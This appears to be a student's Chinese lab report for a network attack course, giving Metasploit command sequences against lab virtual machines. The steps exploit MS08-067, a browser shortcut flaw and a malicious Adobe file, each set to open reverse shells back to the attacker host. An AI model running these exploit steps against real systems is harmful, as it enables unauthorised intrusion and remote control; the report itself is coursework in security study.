2017-2018-2 20155231《网络对抗技术》实验五: MSF基础应用

2017-2018-2 20155231《网络对抗技术》实验五: MSF基础应用

实验内容

一个主动攻击实践,如ms08_067

  1. 启用msf终端msfconsole

  2. 然后使用search命令搜索该漏洞对应的模块:search ms08_067

  3. 渗透攻击模块路径名为“exploit/windows/smb/ms08_067_netapi” 包含四部分:模块类型、目标平台、目标服务和模块名字。

use exploit/windows/smb/ms08_067_netapi
4. 查看信息:
show payloads

  1. 选择攻击载荷:
    set payload generic/shell_reverse_tcp

  2. 查看配置渗透攻击所需的配置项:
    show options

  3. 查看渗透攻击模块所能成功渗透攻击的目标平台
    show targets

  4. 设置攻击Ip(默认端口445)
    set RHOST 192.168.241.138

  5. 成功后回连主机端口5231
    set LPORT 5231
    set LHOST 192.168.241.134

  6. 目标系统类型在这里为5(该系统没有数据执行保护功能(DEF)
    set target 5

  7. 查看设置后的选项设置的值是否正确:
    show options

  8. 发起渗透攻击
    exploit

  1. 查看结果
    ipconfig /all

一个针对浏览器的攻击,如ms11_050

这里在网上找了一个IE浏览器的漏洞:ms14_064(我们不一样)

  1. 首先输入search ms14_064查找漏洞

  2. 对浏览器进行攻击,输入use exploit/windows/browser/ms10_046_shortcut_icon_

  3. 输入show payloads,查看载荷进行选择,这里用实验载荷set payload generic/shell_reverse_tcp

  4. show options查询需要配置

  5. 输入set SRVHOST 192.168.241.134
    set LHOST 192.168.241.134
    set LPORT 5231

  6. 输入exploit生成URL

  7. 在windows端访问该URL

  8. 在kuil端输入sessions,可看到一个ID为1的连接

  9. 然后输入session -i 1,接入ID为1的连接,输入shell,获取成功。

一个针对客户端的攻击,如Adobe

  1. 首先还是先利用search adobe进行搜索

  2. 然后选择use windows/fileformat/adobe_flashplayer_button

3.然后set payload windows/meterpreter/reverse_tcp,利用show options查看所要配置的信息

  1. 需要对LHOSTLPORTFILENAME进行配置

  2. 输入exploit,生成pdf文件

  3. 输入use exploit/multi/handler,设置监听端口,主机号

  4. exploit开始监听

  5. 在windows端,打开20155231.pdf,成功回连

(我们不一样。。。试过很多个模板,然而只成功过一次,还没有截图。大部分都这样,回连没成功,端口没有打开)

成功应用任何一个辅助模块

  1. 利用show auxiliary,查看辅助模块(我们不一样)

  2. 选择scanner/http/title,扫描网页标签

  3. 查看配置,配置LHOST192.168.241.134

  4. 输入exploit进行监听

显示如图。但不知道标签记录在哪里,这漏洞有啥用?

试验后回答问题

  1. 用自己的话解释什么是exploit,payload,encode.
  • exploit是执行漏洞。
  • payload是有效载荷,执行代码的一个载体模板
  • encode是编码,对我们的程序或代码进行伪装

实践总结与体会

由于自己电脑配置有点渣。。两个虚拟机一起开略卡,用了同学的电脑做实验。成功的人都是一个样,没成功的人各有个的不同。查看过其他同学在实验中遇到的问题和解决方法。有的解决了,有的依然没又解决。。。

离实战还缺些什么技术或步骤?

很多用漏洞产生的文件都会遭到管家的查杀,实战中实现回连是个问题,诱导靶机执行操作也是问题

posted @ 2018-05-02 20:59  名字最难取  阅读(238)  评论(0编辑  收藏  举报